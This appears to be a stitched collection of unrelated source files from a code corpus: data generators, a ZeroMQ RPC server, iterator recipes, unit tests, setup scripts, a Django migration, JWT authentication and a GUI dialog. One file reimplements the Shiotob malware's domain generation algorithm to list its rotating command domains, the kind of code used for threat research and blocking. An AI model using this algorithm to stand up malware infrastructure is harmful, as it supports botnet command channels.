def data_gauss(N0, N1=None, mu0=arr([0, 0]), mu1=arr([1, 1]), sig0=np.eye(2), sig1=np.eye(2)):
"""Sample data from a two-component Gaussian mixture model.
Args:
N0 (int): Number of data to sample for class -1.
        N1 (int): Number of data to sample for class 1.
mu0 (arr): numpy array
mu1 (arr): numpy array
sig0 (arr): numpy array
sig1 (arr): numpy array
Returns:
X (array): Array of sampled data
Y (array): Array of class values that correspond to the data points in X.
TODO: test more
"""
if not N1:
N1 = N0
d1,d2 = twod(mu0).shape[1],twod(mu1).shape[1]
if d1 != d2 or np.any(twod(sig0).shape != arr([d1, d1])) or np.any(twod(sig1).shape != arr([d1, d1])):
raise ValueError('data_gauss: dimensions should agree')
X0 = np.dot(np.random.randn(N0, d1), sqrtm(sig0))
X0 += np.ones((N0,1)) * mu0
Y0 = -np.ones(N0)
X1 = np.dot(np.random.randn(N1, d1), sqrtm(sig1))
X1 += np.ones((N1,1)) * mu1
Y1 = np.ones(N1)
X = np.row_stack((X0,X1))
Y = np.concatenate((Y0,Y1))
return X,Y
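# Hedged usage sketch (editorial addition): sample size and means are placeholders.
#
#   >>> X, Y = data_gauss(100, mu0=arr([0., 0.]), mu1=arr([2., 2.]))
#   >>> X.shape, Y.shape      # 100 points per class
#   ((200, 2), (200,))
#   >>> np.unique(Y)          # class labels are -1 and +1
#   array([-1.,  1.])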
def data_GMM(N, C, D=2, get_Z=False):
"""Sample data from a Gaussian mixture model.
Builds a random GMM with C components and draws M data x^{(i)} from a mixture
of Gaussians in D dimensions
Args:
N (int): Number of data to be drawn from a mixture of Gaussians.
C (int): Number of clusters.
D (int): Number of dimensions.
        get_Z (bool): If True, returns an array indicating the cluster from which each
data point was drawn.
Returns:
X (arr): N x D array of data.
Z (arr): 1 x N array of cluster ids; returned also only if get_Z=True
TODO: test more; N vs M
"""
C += 1
pi = np.zeros(C)
for c in range(C):
pi[c] = gamrand(10, 0.5)
pi = pi / np.sum(pi)
cpi = np.cumsum(pi)
rho = np.random.rand(D, D)
rho = rho + twod(rho).T
rho = rho + D * np.eye(D)
rho = sqrtm(rho)
mu = mat(np.random.randn(c, D)) * mat(rho)
ccov = []
for i in range(C):
tmp = np.random.rand(D, D)
tmp = tmp + tmp.T
tmp = 0.5 * (tmp + D * np.eye(D))
ccov.append(sqrtm(tmp))
p = np.random.rand(N)
Z = np.ones(N)
for c in range(C - 1):
Z[p > cpi[c]] = c
Z = Z.astype(int)
X = mu[Z,:]
for c in range(C):
X[Z == c,:] = X[Z == c,:] + mat(np.random.randn(np.sum(Z == c), D)) * mat(ccov[c])
if get_Z:
return (arr(X),Z)
else:
return arr(X)
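# Hedged usage sketch (editorial addition): the sample size and cluster count are
# placeholders; the mixture itself is drawn at random on every call.
#
#   >>> X, Z = data_GMM(500, 3, D=2, get_Z=True)
#   >>> X.shape, Z.shape
#   ((500, 2), (500,))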
def gamrand(alpha, lmbda):
"""Gamma(alpha, lmbda) generator using the Marsaglia and Tsang method
Args:
alpha (float): scalar
lambda (float): scalar
Returns:
(float) : scalar
TODO: test more
"""
# (algorithm 4.33).
if alpha > 1:
        d = alpha - 1.0 / 3.0
c = 1 / np.sqrt(9 * d)
flag = 1
while flag:
Z = np.random.randn()
if Z > -1 / c:
V = (1 + c * Z)**3
U = np.random.rand()
flag = np.log(U) > (0.5 * Z**2 + d - d * V + d * np.log(V))
return d * V / lmbda
else:
x = gamrand(alpha + 1, lmbda)
return x * np.random.rand()**(1 / alpha)
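# Hedged sanity check (editorial addition): draws from gamrand(alpha, lmbda) should be
# non-negative with mean roughly alpha / lmbda; exact values depend on the RNG state.
#
#   >>> draws = np.array([gamrand(2.0, 1.0) for _ in range(2000)])
#   >>> bool(np.all(draws >= 0))
#   True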
def data_mouse():
"""Simple by-hand data generation using the GUI
Opens a matplotlib plot window, and allows the user to specify points with the mouse.
Each button is its own class (1,2,3); close the window when done creating data.
Returns:
X (arr): Mx2 array of data locations
Y (arr): Mx1 array of labels (buttons)
"""
import matplotlib.pyplot as plt
fig = plt.figure()
ax = fig.add_subplot(111, xlim=(-1,2), ylim=(-1,2))
X = np.zeros( (0,2) )
Y = np.zeros( (0,) )
col = ['bs','gx','ro']
def on_click(event):
X.resize( (X.shape[0]+1,X.shape[1]) )
X[-1,:] = [event.xdata,event.ydata]
Y.resize( (Y.shape[0]+1,) )
Y[-1] = event.button
ax.plot( event.xdata, event.ydata, col[event.button-1])
fig.canvas.draw()
fig.canvas.mpl_connect('button_press_event',on_click)
plt.show()
return X,Y
| apache-2.0 | 3,725,305,290,967,670,300 | 22.926136 | 103 | 0.582284 | false | 2.67026 | false | false | false |
wmttom/wormhole | wormhole/server.py | 1 | 1497 | #coding:utf-8
import zmq
import json
context = zmq.Context()
class Server(object):
def __init__(self, port):
self.server = context.socket(zmq.REP)
self.server.bind("tcp://*:{0}".format(port))
def run(self):
print "ready"
while True:
recv = self.server.recv()
recv_dict = json.loads(recv)
func = recv_dict['func']
arg = recv_dict['arg']
try:
if arg:
return_main = getattr(self, func)(*arg)
else:
return_main = getattr(self, func)()
except Exception, ex:
return_main = None
return_error = str(ex)
else:
return_error = None
finally:
self.server.send(json.dumps({"main": return_main, "error":return_error}))
class AsyncServer(object):
def __init__(self, port):
self.server = context.socket(zmq.PULL)
self.server.bind("tcp://*:{0}".format(port))
def run(self):
print "ready"
while True:
recv = self.server.recv()
recv_dict = json.loads(recv)
func = recv_dict['func']
arg = recv_dict['arg']
try:
if arg:
return_main = getattr(self, func)(*arg)
else:
return_main = getattr(self, func)()
except Exception, ex:
print ex | mit | 6,078,282,835,601,481,000 | 27.807692 | 89 | 0.47161 | false | 4.240793 | false | false | false |
baderj/domain_generation_algorithms | shiotob/dga.py | 1 | 1677 | import argparse
def get_next_domain(domain):
qwerty = 'qwertyuiopasdfghjklzxcvbnm123945678'
def sum_of_characters(domain):
return sum([ord(d) for d in domain[:-3]])
sof = sum_of_characters(domain)
ascii_codes = [ord(d) for d in domain] + 100*[0]
old_hostname_length = len(domain) - 4
for i in range(0, 66):
for j in range(0, 66):
edi = j + i
if edi < 65:
p = (old_hostname_length * ascii_codes[j])
cl = p ^ ascii_codes[edi] ^ sof
ascii_codes[edi] = cl & 0xFF
"""
calculate the new hostname length
max: 255/16 = 15
min: 10
"""
cx = ((ascii_codes[2]*old_hostname_length) ^ ascii_codes[0]) & 0xFF
hostname_length = int(cx/16) # at most 15
if hostname_length < 10:
hostname_length = old_hostname_length
"""
generate hostname
"""
for i in range(hostname_length):
index = int(ascii_codes[i]/8) # max 31 --> last 3 chars of qwerty unreachable
bl = ord(qwerty[index])
ascii_codes[i] = bl
hostname = ''.join([chr(a) for a in ascii_codes[:hostname_length]])
"""
append .net or .com (alternating)
"""
tld = '.com' if domain.endswith('.net') else '.net'
domain = hostname + tld
return domain
if __name__=="__main__":
""" example seed domain: 4ypv1eehphg3a.com """
parser = argparse.ArgumentParser(description="DGA of Shiotob")
parser.add_argument("domain", help="initial domain")
args = parser.parse_args()
domain = args.domain
for i in range(2001):
print(domain)
domain = get_next_domain(domain)
| gpl-2.0 | 6,526,263,581,269,655,000 | 27.913793 | 85 | 0.571258 | false | 3.422449 | false | false | false |
ActiveState/code | recipes/Python/499379_GroupBySorted/recipe-499379.py | 1 | 2704 | __docformat__ = "restructuredtext"
class peekable:
"""Make an iterator peekable.
This is implemented with an eye toward simplicity. On the downside,
you can't do things like peek more than one item ahead in the
iterator. On the bright side, it doesn't require anything from
itertools, etc., so it's less likely to encounter strange bugs,
    which occasionally do happen.
Example usage::
>>> numbers = peekable(range(6))
>>> numbers.next()
0
>>> numbers.next()
1
>>> numbers.peek()
2
>>> numbers.next()
2
>>> numbers.next()
3
>>> for i in numbers:
... print i
...
4
5
"""
_None = () # Perhaps None is a valid value.
def __init__(self, iterable):
self._iterable = iter(iterable)
self._buf = self._None
def __iter__(self):
return self
def _is_empty(self):
return self._buf is self._None
def peek(self):
"""Peek at the next element.
This may raise StopIteration.
"""
if self._is_empty():
self._buf = self._iterable.next()
return self._buf
def next(self):
if self._is_empty():
return self._iterable.next()
ret = self._buf
self._buf = self._None
return ret
def groupbysorted(iterable, keyfunc=None):
"""This is a variation of itertools.groupby.
The itertools.groupby iterator assumes that the input is not sorted
but will fit in memory. This iterator has the same API, but assumes
the opposite.
Example usage::
>>> for (key, subiter) in groupbysorted(
... ((1, 1), (1, 2), (2, 1), (2, 3), (2, 9)),
... keyfunc=lambda row: row[0]):
... print "New key:", key
... for x in subiter:
... print "Row:", x
...
New key: 1
Row: (1, 1)
Row: (1, 2)
New key: 2
Row: (2, 1)
Row: (2, 3)
Row: (2, 9)
This requires the peekable class. See my comment here_.
Note, you must completely iterate over each subiter or groupbysorted will
get confused.
.. _here:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/304373
"""
iterable = peekable(iterable)
if not keyfunc:
def keyfunc(x):
return x
def peekkey():
return keyfunc(iterable.peek())
def subiter():
while True:
if peekkey() != currkey:
break
yield iterable.next()
while True:
currkey = peekkey()
yield (currkey, subiter())
| mit | -8,495,643,545,564,302,000 | 22.111111 | 77 | 0.527737 | false | 4.017831 | false | false | false |
lwahlmeier/python-threadly | tests/futureCheck.py | 1 | 1948 | import threadly, time, random
import unittest
clf = 0
llf = 0
def callLF(lf):
# print "CALLED"
lf.setter(True)
def listenFromFuture():
global llf
# print "GotCalled"
llf +=1
def callFromFuture(s):
global clf
# print "GotCalled", s
clf +=1
def listenException():
raise Exception("TEST1")
def callException(s):
raise Exception("TEST1")
class TestFutures(unittest.TestCase):
def test_futureTest1(self):
global clf, llf
sch = threadly.Scheduler(10)
LF1 = threadly.ListenableFuture()
LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
LF2.add_listener(listenFromFuture)
LF2.add_callable(callFromFuture)
LF1.add_listener(listenFromFuture)
LF1.add_callable(callFromFuture)
self.assertTrue(LF1.get())
self.assertTrue(LF2.get())
self.assertEquals(2, llf)
self.assertEquals(2, clf)
LF2.add_listener(listenFromFuture)
LF2.add_callable(callFromFuture)
LF1.add_listener(listenFromFuture)
LF1.add_callable(callFromFuture)
self.assertEquals(4, llf)
self.assertEquals(4, clf)
sch.shutdown()
def test_futureCallerExceptions(self):
global clf, llf
sch = threadly.Scheduler(10)
LF1 = threadly.ListenableFuture()
LF1.add_listener(listenException)
LF1.add_listener(listenException)
LF1.add_callable(callException)
LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
self.assertTrue(LF1.get())
self.assertTrue(LF2.get())
sch.shutdown()
def test_futureDoubleSet(self):
global clf, llf
sch = threadly.Scheduler(10)
LF1 = threadly.ListenableFuture()
LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
self.assertTrue(LF1.get())
self.assertTrue(LF2.get())
LF3 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
self.assertFalse(LF3.get())
self.assertEquals(10, sch.get_poolsize())
sch.shutdown()
if __name__ == '__main__':
unittest.main()
| unlicense | -4,023,683,026,387,194,400 | 24.973333 | 66 | 0.690965 | false | 3.001541 | true | false | false |
cheral/orange3 | Orange/tests/test_fss.py | 8 | 3767 | # Test methods with long descriptive names can omit docstrings
# pylint: disable=missing-docstring
import unittest
import numpy as np
from scipy.sparse import csr_matrix
from Orange.data import Table, Variable
from Orange.preprocess.score import ANOVA, Gini, UnivariateLinearRegression, \
Chi2
from Orange.preprocess import SelectBestFeatures, Impute, RemoveNaNColumns, SelectRandomFeatures
class TestFSS(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.titanic = Table('titanic')
cls.wine = Table('wine')
cls.iris = Table('iris')
cls.auro_mpg = Table('auto-mpg')
def setUp(self):
Variable._clear_all_caches()
def test_select_1(self):
gini = Gini()
s = SelectBestFeatures(method=gini, k=1)
data2 = s(self.titanic)
best = max((gini(self.titanic, f), f) for f in self.titanic.domain.attributes)[1]
self.assertEqual(data2.domain.attributes[0], best)
def test_select_threshold(self):
anova = ANOVA()
t = 30
data2 = SelectBestFeatures(method=anova, threshold=t)(self.wine)
self.assertTrue(all(anova(self.wine, f) >= t for f in data2.domain.attributes))
def test_error_when_using_regression_score_on_classification_data(self):
s = SelectBestFeatures(method=UnivariateLinearRegression(), k=3)
with self.assertRaises(ValueError):
s(self.wine)
def test_discrete_scores_on_continuous_features(self):
c = self.iris.columns
for method in (Gini(), Chi2()):
d1 = SelectBestFeatures(method=method)(self.iris)
expected = \
(c.petal_length, c.petal_width, c.sepal_length, c.sepal_width)
self.assertSequenceEqual(d1.domain.attributes, expected)
scores = method(d1)
self.assertEqual(len(scores), 4)
score = method(d1, c.petal_length)
self.assertIsInstance(score, float)
def test_continuous_scores_on_discrete_features(self):
data = Impute()(self.auro_mpg)
with self.assertRaises(ValueError):
UnivariateLinearRegression()(data)
d1 = SelectBestFeatures(method=UnivariateLinearRegression())(data)
self.assertEqual(len(d1.domain), len(data.domain))
def test_defaults(self):
fs = SelectBestFeatures(k=3)
data2 = fs(Impute()(self.auro_mpg))
self.assertTrue(all(a.is_continuous for a in data2.domain.attributes))
data2 = fs(self.wine)
self.assertTrue(all(a.is_continuous for a in data2.domain.attributes))
data2 = fs(self.titanic)
self.assertTrue(all(a.is_discrete for a in data2.domain.attributes))
class TestRemoveNaNColumns(unittest.TestCase):
def test_column_filtering(self):
data = Table("iris")
data.X[:, (1, 3)] = np.NaN
new_data = RemoveNaNColumns()(data)
self.assertEqual(len(new_data.domain.attributes),
len(data.domain.attributes) - 2)
data = Table("iris")
data.X[0, 0] = np.NaN
new_data = RemoveNaNColumns()(data)
self.assertEqual(len(new_data.domain.attributes),
len(data.domain.attributes))
def test_column_filtering_sparse(self):
data = Table("iris")
data.X = csr_matrix(data.X)
new_data = RemoveNaNColumns()(data)
self.assertEqual(data, new_data)
class TestSelectRandomFeatures(unittest.TestCase):
def test_select_random_features(self):
data = Table("voting")
for k_features, n_attributes in ((3, 3), (0.25, 4)):
srf = SelectRandomFeatures(k=k_features)
new_data = srf(data)
self.assertEqual(len(new_data.domain.attributes), n_attributes)
| bsd-2-clause | 5,897,100,212,451,810,000 | 34.87619 | 96 | 0.640297 | false | 3.615163 | true | false | false |
jeetsukumaran/Ginkgo | ginkgopy/setup.py | 1 | 2611 | #! /usr/bin/env python
###############################################################################
##
## GINKGO Biogeographical Evolution Simulator Post-Processing Library.
##
## Copyright 2009 Jeet Sukumaran and Mark T. Holder.
##
## This program is free software; you can redistribute it and#or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License along
##  with this program. If not, see <http://www.gnu.org/licenses/>.
##
###############################################################################
"""
Package setup and installation.
"""
import ez_setup
ez_setup.use_setuptools()
from setuptools import setup
from setuptools import find_packages
from ginkgo import PACKAGE_VERSION
import sys
import os
import subprocess
script_names = ['ginkgo-ascii-grid.py', 'ginkgo-grid-coordinates.py']
setup(name='Ginkgo',
version=PACKAGE_VERSION,
author='Jeet Sukumaran and Mark T. Holder',
author_email='jeet@ku.edu and mtholder@ku.edu',
url='',
description="""\
A library to facilitate setting up runs and processing results of the GINKGO Biogeographical Evolution Simulator""",
license='GPL 3+',
packages=['ginkgo'],
package_dir={'ginkgo': 'ginkgo'},
package_data={
"" : ['doc/*'],
"ginkgo" : ["tests/data/*"]
},
scripts = [('scripts/%s' % i) for i in script_names],
test_suite = "ginkgo.tests",
include_package_data=True,
zip_safe=True,
install_requires=[
"DendroPy >= 3.0.0",
],
entry_points="""
# -*- Entry points: -*-
""",
long_description=open('README.txt', 'rU').read(),
classifiers = [
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: GNU General Public License (GPL)",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Scientific/Engineering :: Bio-Informatics",
],
keywords='phylogenetics evolution biology biogeography',
)
| gpl-3.0 | -7,690,661,539,944,862,000 | 33.813333 | 115 | 0.607047 | false | 4.079688 | false | false | false |
hpfn/charcoallog | charcoallog/bank/migrations/0001_initial.py | 1 | 1232 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-01-21 11:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('core', '0012_auto_20180121_1155')
]
operations = [
migrations.CreateModel(
name='Extract',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_name', models.CharField(max_length=30, verbose_name='Name')),
('date', models.DateField(verbose_name='Date')),
('money', models.DecimalField(decimal_places=2, max_digits=12, verbose_name='Money')),
('description', models.CharField(max_length=70, verbose_name='Description')),
('category', models.CharField(max_length=70, verbose_name='Category')),
('payment', models.CharField(max_length=70, verbose_name='Payment')),
],
options={
'ordering': ['-date'],
},
),
]
operations = [
migrations.SeparateDatabaseAndState(state_operations=operations)
]
| gpl-3.0 | 1,365,360,019,991,636,500 | 33.222222 | 114 | 0.575487 | false | 4.248276 | false | false | false |
digling/sinotibetan | datasets/bai/modify_bai.py | 1 | 3172 | from lib.sino import db
import lingpyd as lingpy
numbersup = '¹²³⁴⁵⁶⁰'
numbersdown = '₁₂₃₄₅₆₀'
for k in db:
subgroup = db[k,'subgroup']
if subgroup == 'Bai':
# modify tokens
tks = db[k,'tokens']
if tks not in ['-','']:
tks = tks.split(' ')
ntk = []
while tks:
tk = tks.pop(0)
if tk[0] in numbersdown:
for a,b in zip(numbersdown,numbersup):
tk = tk.replace(a,b)
ntk += [tk]
# expand nasals
elif "\u0303" in tk or tk[0] in "ãũẽĩõ":
ntk += [tk,lingpy.rc('nasal_placeholder')]
else:
ntk += [tk]
db[k][db.header['tokens']] = ' '.join(ntk)
# same for ipa
ipa = db[k,'ipa']
for a,b in zip(numbersdown, numbersup):
            ipa = ipa.replace(a,b)
db[k][db.header['ipa']] = ipa
db._clean_cache()
# assemble cognate ids and align them again for bai
alms = {}
etd = db.get_etymdict(ref='cogid')
for k in etd:
print ("Carrying out alignment for {0}".format(k))
idxs = [idx[0] for idx in etd[k] if idx]
nidxs, alms = [], []
for idx in idxs:
alm = db[idx,'tokens']
sbg = db[idx,'subgroup']
if alm != '-' and alm and sbg=='Bai':
nidxs += [idx]
alms += [alm]
if alms:
msa = lingpy.Multiple(alms)
msa.lib_align()
for idx,alm in zip(nidxs,msa.alm_matrix):
db[idx][db.header['alignment']] = ' '.join(alm)
cidx = db._rowIdx
ignore = []
for k in db:
c = db[k, 'concept']
if c == 'to plant (grow)':
db[k][cidx] = 'to plant'
elif c == 'lie, rest':
if db[k,'ipa'] == '-' or db[k,'ipa'] == '':
ignore += [k]
elif c == 'to the dream':
db[k][cidx] = 'the dream'
elif c == 'to suck':
if db[k,'ipa'] == '-' or db[k,'ipa'] == '':
db[k][cidx] = 'to lick'
elif c == 'to work':
db[k][cidx] = 'the work'
# search for potential duplicates
dups = {}
for d in db.doculect:
# get data flat
idxs = db.get_list(doculect=d, flat=True)
tks = db.get_list(doculect=d, flat=True, entry='tokens')
# iterate over all tokens and search for identical words
dup = {}
for idx,tk in zip(idxs,tks):
if tk not in ['-','']:
try:
dup[tk] += [idx]
except KeyError:
dup[tk] = [idx]
for k in dup:
if k not in ['-','']:
if len(dup[k]) > 1:
basei = dup[k][0]
basec = db[basei,'concept']
base = '{0} ({1})'.format(basei, basec)
for idx in dup[k][1:]:
dups[idx] = base
for k in db:
if k not in dups:
dups[k] = ''
if db[k,'ipa'] == '0':
db[k][db.header['ipa']] = ''
db[k][db.header['tokens']] = ''
db.add_entries('duplicates', dups, lambda x: x)
# add line for duplicates
db.update('sinotibetan',verbose=True, delete=ignore)
| gpl-2.0 | 8,496,444,828,046,954,000 | 26.79646 | 62 | 0.463228 | false | 3.055447 | false | false | false |
milkmeat/thomas | project euler/q51.py | 1 | 1040 | def listprime(lp):
prime=[True]*lp
prime[0]=False
prime[1]=False
for x in range(lp):
if prime[x]:
bei=x+x
while bei<lp:
prime[bei]=False
bei+=x
return prime
def replaceStar(s):
result=[]
if '*' in s:
for n in range(0,9+1):
news = s.replace('*', str(n))
if news[0]!='0':
result.append(news)
else:
result.append(s)
return result
primes=listprime(10000000)
def countPrime(list):
result=[]
for s in list:
if primes[int(s)]:
result.append(s)
return result
# print countPrime(replaceStar('56**3'))
# print countPrime(replaceStar('*3'))
def generate(g):
if g==0:
yield ''
return
for other in generate(g-1):
for first in '1234567890*':
yield first+other
for x in generate(6):
if len(countPrime(replaceStar(x)))==8:
print countPrime(replaceStar(x))
| mit | -4,113,597,390,468,659,000 | 19.666667 | 42 | 0.500962 | false | 3.623693 | false | false | false |
Jdsleppy/sweetmorse | setup.py | 1 | 2423 | from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
long_description = """sweetmorse
----------
Morse code tools from read to write, analog to digital.
.. image:: https://www.travis-ci.org/Jdsleppy/sweetmorse.svg?branch=master
:target: https://www.travis-ci.org/Jdsleppy/sweetmorse
Compatibility
-------------
Targets Python3, tested against Python 3.3-3.6.
More info
---------
See a crash course at https://github.com/Jdsleppy/sweetmorse
"""
setup(
name='sweetmorse',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='1.1.0',
description='Morse code tools from read to write, analog to digital',
long_description=long_description,
url='https://github.com/Jdsleppy/sweetmorse',
author='Joel Sleppy',
author_email='jdsleppy@gmail.com',
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 1 - Planning',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries',
'Topic :: Communications :: Ham Radio',
'Topic :: Multimedia :: Sound/Audio',
# (should match "license" above)
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
keywords='morse signal electronics',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['tests']),
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[],
python_requires='~=3.0',
package_data={},
data_files=[],
entry_points={
'console_scripts': [
'sweetmorse = sweetmorse.main:main',
],
},
)
| mit | 7,612,446,665,855,582,000 | 27.174419 | 79 | 0.645481 | false | 3.762422 | false | false | false |
MenloAthertonCoding/cruzebase | authtoken/authentication.py | 1 | 5202 | from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from rest_framework import authentication
from rest_framework.exceptions import AuthenticationFailed
from jwt.exceptions import TokenException
from jwt import BaseToken, compare, token_factory
from auth.models import UserProfile
from authtoken.settings import api_settings, secret_key
def get_token_instance(user_profile):
return token_factory(
api_settings.TOKEN_HEADER_CLAIMSET_CLASS,
api_settings.TOKEN_PAYLOAD_CLAIMSET_CLASS,
{
'payload': {'aud': api_settings.TOKEN_AUDIENCE or user_profile.id}
}
)
def validate_user(user):
"""Validates a user is active and can be used to authenticate.
"""
# From Django 1.10 onwards the `authenticate` call simply
# returns `None` for is_active=False users.
# (Assuming the default `ModelBackend` authentication backend.)
if not user.is_active:
raise ValidationError('User account is disabled.')
def authenticate_credentials(kwargs):
"""
Returns a UserProfile object from the given kwargs if the UserProfile object
exists and is valid. AuthTokenSerializer validates UserProfile object.
"""
try:
user_profile = UserProfile.objects.get(**kwargs)
except UserProfile.DoesNotExist:
raise AuthenticationFailed('User non existant')
try:
validate_user(user_profile.user)
except ValidationError as exc:
raise AuthenticationFailed(_(str(exc)))
return user_profile
class JSONWebTokenAuthentication(authentication.BaseAuthentication):
"""
JSON Web Token based authentication conforming to RFC 7519.
See https://jwt.io/introduction/ and https://openid.net/specs/draft-jones-json-web-token-07.html
for more about JWTs.
Clients should authenticate by passing the JWT token key in the "Authorization"
HTTP header, prepended with the string "Bearer ".
For example:
Authorization: Bearer eyJhbGciO.eyJzdWIiOiIxMjM0NTY3ODkwIiwib.TJVA95OrM7E2cBab3
"""
keyword = 'Bearer'
www_authenticate_realm = 'api'
def authenticate(self, request):
"""
Authenticate the request if the signature is valid and return a two-tuple of (user, token).
"""
auth = authentication.get_authorization_header(request).split()
if not auth or auth[0].lower() != self.keyword.lower().encode():
return None
token = self.validate_bearer(auth)
try:
# TODO Remove this, and don't verify audience as it is not
# verified yet.
user_profile = self.get_token_user(request, token)
if user_profile is not None:
token_instance = get_token_instance(user_profile)
# Verify token
if compare(token, token_instance, secret_key(),
api_settings.TOKEN_VERIFICATION_ALGORITHM_INSTANCE):
return (user_profile.user, token)
except AuthenticationFailed as exc:
raise AuthenticationFailed(_(str(exc) or 'Provided credentials invalid.'))
except TokenException as exc:
raise AuthenticationFailed(_(str(exc)))
def get_token_user(self, request, token):
"""Gets the user specified in the request headers or, more commmonly,
in the token payload itself.
"""
# Get username or user id in request headers
username = request.META.get('X_USERNAME')
user_id = request.META.get('HTTP_USER_ID') # ex. USER-ID: 100
payload = BaseToken.clean(token)[1]
user_profile = None
# Get user from username, user_id, or from token payload.
if username:
user_profile = authenticate_credentials({'user__username': username})
elif user_id:
user_profile = authenticate_credentials({'id': user_id})
elif payload.get('aud'):
user_profile = authenticate_credentials({'id': payload.get('aud')})
return user_profile
def validate_bearer(self, bearer):
"""Ensure the token passed through request headers is valid and is parsable.
If the token is not valid or not parsable, `AuthenticationFailed` is raised.
"""
if len(bearer) == 1:
msg = _('Invalid token header. No credentials provided.')
raise AuthenticationFailed(msg)
elif len(bearer) > 2:
msg = _('Invalid token header. Token string should not contain spaces.')
raise AuthenticationFailed(msg)
try:
token = bearer[1]
except UnicodeError:
msg = _('Invalid token header. Token string should not contain invalid characters.')
raise AuthenticationFailed(msg)
return token
def authenticate_header(self, request):
"""Return a string to be used as the value of the `WWW-Authenticate`
header in a `401 Unauthenticated` response, or `None` if the
authentication scheme should return `403 Permission Denied` responses.
"""
return '{0} realm="{1}"'.format(self.keyword, self.www_authenticate_realm)
| apache-2.0 | 8,676,209,387,682,481,000 | 36.157143 | 100 | 0.656863 | false | 4.386172 | false | false | false |
Lucasgscruz/harpia | harpia/bpGUI/rotate.py | 2 | 9475 | # -*- coding: utf-8 -*-
# [HARPIA PROJECT]
#
#
# S2i - Intelligent Industrial Systems
# DAS - Automation and Systems Department
# UFSC - Federal University of Santa Catarina
# Copyright: 2006 - 2007 Luis Carlos Dill Junges (lcdjunges@yahoo.com.br), Clovis Peruchi Scotti (scotti@ieee.org),
# Guilherme Augusto Rutzen (rutzen@das.ufsc.br), Mathias Erdtmann (erdtmann@gmail.com) and S2i (www.s2i.das.ufsc.br)
# 2007 - 2009 Clovis Peruchi Scotti (scotti@ieee.org), S2i (www.s2i.das.ufsc.br)
#
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further information, check the COPYING file distributed with this software.
#
# ----------------------------------------------------------------------
import gtk
from harpia.GladeWindow import GladeWindow
from harpia.s2icommonproperties import S2iCommonProperties, APP, DIR
# i18n
import os
from harpia.utils.XMLUtils import XMLParser
import gettext
_ = gettext.gettext
gettext.bindtextdomain(APP, DIR)
gettext.textdomain(APP)
# ----------------------------------------------------------------------
class Properties(GladeWindow, S2iCommonProperties):
# ----------------------------------------------------------------------
def __init__(self, PropertiesXML, S2iBlockProperties):
self.m_sDataDir = os.environ['HARPIA_DATA_DIR']
filename = self.m_sDataDir + 'glade/rotate.ui'
self.m_oPropertiesXML = PropertiesXML
self.m_oS2iBlockProperties = S2iBlockProperties
widget_list = [
'Properties',
'isAtCenter',
'isAtPoint',
'isScalling',
'isFilling',
'xC',
'yC',
'BackgroundColor',
'BorderColor',
'HelpView',
'prop_confirm'
]
handlers = [
'on_cancel_clicked',
'on_prop_confirm_clicked',
'on_BackColorButton_clicked',
'on_BorderColorButton_clicked'
]
top_window = 'Properties'
GladeWindow.__init__(self, filename, top_window, widget_list, handlers)
# load properties values
self.block_properties = self.m_oPropertiesXML.getTag("properties").getTag("block").getChildTags("property")
for Property in self.block_properties:
if Property.name == "xC":
self.widgets['xC'].set_value(float(Property.value));
if Property.name == "yC":
self.widgets['yC'].set_value(float(Property.value));
if Property.name == "isFilling":
if Property.value == "true":
self.widgets['isFilling'].set_active(True);
else:
self.widgets['isFilling'].set_active(False);
if Property.name == "isScalling":
if Property.value == "true":
self.widgets['isScalling'].set_active(True);
else:
self.widgets['isScalling'].set_active(False);
if Property.name == "isCenter":
if Property.value == "true":
self.widgets['isAtCenter'].set_active(True);
else:
self.widgets['isAtPoint'].set_active(True);
self.configure()
# load help text
# t_oS2iHelp = XMLParser(self.m_sDataDir + "help/rotate" + _("_en.help"))
# t_oTextBuffer = gtk.TextBuffer()
# t_oTextBuffer.set_text(unicode(str(t_oS2iHelp.getTag("help").getTag("content").getTagContent())))
# self.widgets['HelpView'].set_buffer(t_oTextBuffer)
#------------------------Help Text----------------------------------------------
    def getHelp(self):  # help added
        return "Detects circular shapes in the input image.\
            Output 1 is the evaluation result (*) and output 2 shows the circles found."
# ----------------------------------------------------------------------
def __del__(self):
pass
